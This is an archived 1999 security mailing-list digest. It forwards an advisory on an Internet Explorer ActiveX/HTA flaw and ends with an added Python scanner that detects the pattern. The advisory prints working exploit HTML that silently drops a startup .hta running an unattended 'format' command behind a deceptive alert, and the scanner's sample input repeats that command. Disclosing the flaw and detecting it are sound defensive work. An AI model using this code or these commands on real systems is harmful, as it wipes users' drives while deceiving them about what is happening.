>Mailing-List: list [EMAIL PROTECTED]; contact [EMAIL PROTECTED]
>Date: 30 Aug 1999 07:00:51 -0000
>Delivered-To: mailing list [EMAIL PROTECTED]
>List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
>From: [EMAIL PROTECTED]
>Reply-to: [EMAIL PROTECTED]
>To: [EMAIL PROTECTED]
>Subject: [cybercrime-alerts] Digest Number 27
>X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id DAA20599
>
>
>This e-mail via the CYBERCRIME-ALERTS list at http://theMezz.com/alerts
>
>There is 1 message in this issue.
>
> Topics in today's digest:
>
>      1. Internet Explorer code that formats local drives 
>           From: [EMAIL PROTECTED]
>
>
>_______________________________________________________________________________
>
>Message: 1
>   Date: Mon, 30 Aug 1999 02:52:52 -0700
>   From: [EMAIL PROTECTED]
>Subject: Internet Explorer code that formats local drives 
>
>
>The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
>
>Internet Explorer code that formats local drives
>
>------------------------------------------------------------
>
>In a previous article (A flaw in IE 5.0 ActiveX control allows executing programs) we explained how hta (HTML application) code in a web page can be used to attack machines visiting a certain web site.
>We received another dangerous example of this flaw, but in this demonstration the local hard drives are formatted, without the user's intervention or knowledge.
>
>****************************** 
>
>The following was reported to us by Christian Salvarrey: 
>
>Using the following code (note that the code applies for the Spanish Windows '98. In order for it to work on an English Windows '98, certain obvious changes should be applied):
>
><object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
></object>
><SCRIPT>
>scr.Reset();
>scr.Path="C:\\windows\\Menú inicio\\Programas\\Inicio\\automat.hta";
>scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('start /m format a: /q /autotest /u');alert('IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.');</"+"SCRIPT>";
>scr.write();
>
>I was able to format my D: drive, and A: drive. (I didn't test it on my C: drive for obvious reasons).
>
>The code does as follows:
>1) Using START /m (Spanish Win98 version) the program starts minimized, so the user can't see what's going on.
>2) Using the undocumented parameter /AUTOTEST, it's possible to run FORMAT.COM on any drive automatically (without user intervention)
>3) The alert message can say something like "IMPORTANT : Windows is configuring the system. Please do not interrupt this process." so the user pays attention to that first.
>
>This can be used to hide the fact that the minimized window's title says FORMAT, which is the only giveaway in this procedure.
>
>Obviously, this is a very dangerous flaw, since you can FORMAT, or use DELTREE in the C:\MY DOCUMENTS or C:\WINDOWS folders to erase them also.
>
>
>_______________________________________________________________________________
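
A content check for the pattern the forwarded advisory describes, as an added example that is not part of the original message or SecuriTeam's code: it flags HTML that instantiates either class ID shown in the advisory, assigns an .hta file to a Path property, or invokes FORMAT with /autotest. The function name, finding labels and both sample inputs are assumptions constructed for illustration.

```python
import re

# Class IDs copied from the advisory's two <object> tags (ids "scr" and "wsh").
SCR_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"
WSH_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"

# <object ... classid="clsid:XXXXXXXX-...">, with any quoting and any letter case.
OBJECT_RE = re.compile(
    r"<object\b[^>]*\bclassid\s*=\s*['\"]?\s*clsid:\s*([0-9a-f-]{36})", re.I)
# A script assignment of a quoted string ending in .hta to some object's Path.
HTA_PATH_RE = re.compile(r"\.Path\s*=\s*(['\"])(?:(?!\1).)*\.hta\1", re.I | re.S)
# FORMAT called with the unattended switch named in the advisory.
AUTOTEST_RE = re.compile(r"\bformat\b[^'\"\n]*?/autotest\b", re.I)


def scan_html(html):
    """Return the sorted finding labels for one HTML document (hypothetical labels)."""
    clsids = {c.upper() for c in OBJECT_RE.findall(html)}
    findings = set()
    if SCR_CLSID in clsids:
        findings.add("scr-control")
    if WSH_CLSID in clsids:
        findings.add("wsh-control")
    if HTA_PATH_RE.search(html):
        findings.add("hta-path-assignment")
    if AUTOTEST_RE.search(html):
        findings.add("unattended-format")
    return sorted(findings)


# Constructed sample: keeps the advisory's markers, uses a placeholder path,
# and leaves out the call that writes the file.
SAMPLE_SUSPICIOUS = r'''<object id="scr" classid="clsid:06290bd5-48aa-11d2-8432-006008c3fbfc"></object>
<SCRIPT>
scr.Path="C:\\placeholder\\example.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('start /m format a: /q /autotest /u');</"+"SCRIPT>";
</SCRIPT>'''

# Constructed benign page: an unrelated control and the word "format" in prose.
SAMPLE_BENIGN = ('<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000">'
                 '</object><p>Disk format help: see the manual.</p>')

if __name__ == "__main__":
    for name, doc in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html(doc))
```

Any single finding is worth blocking or alerting on for content from untrusted sites; the combination of the `scr` class ID with an .hta path assignment is the specific file-drop step the advisory walks through.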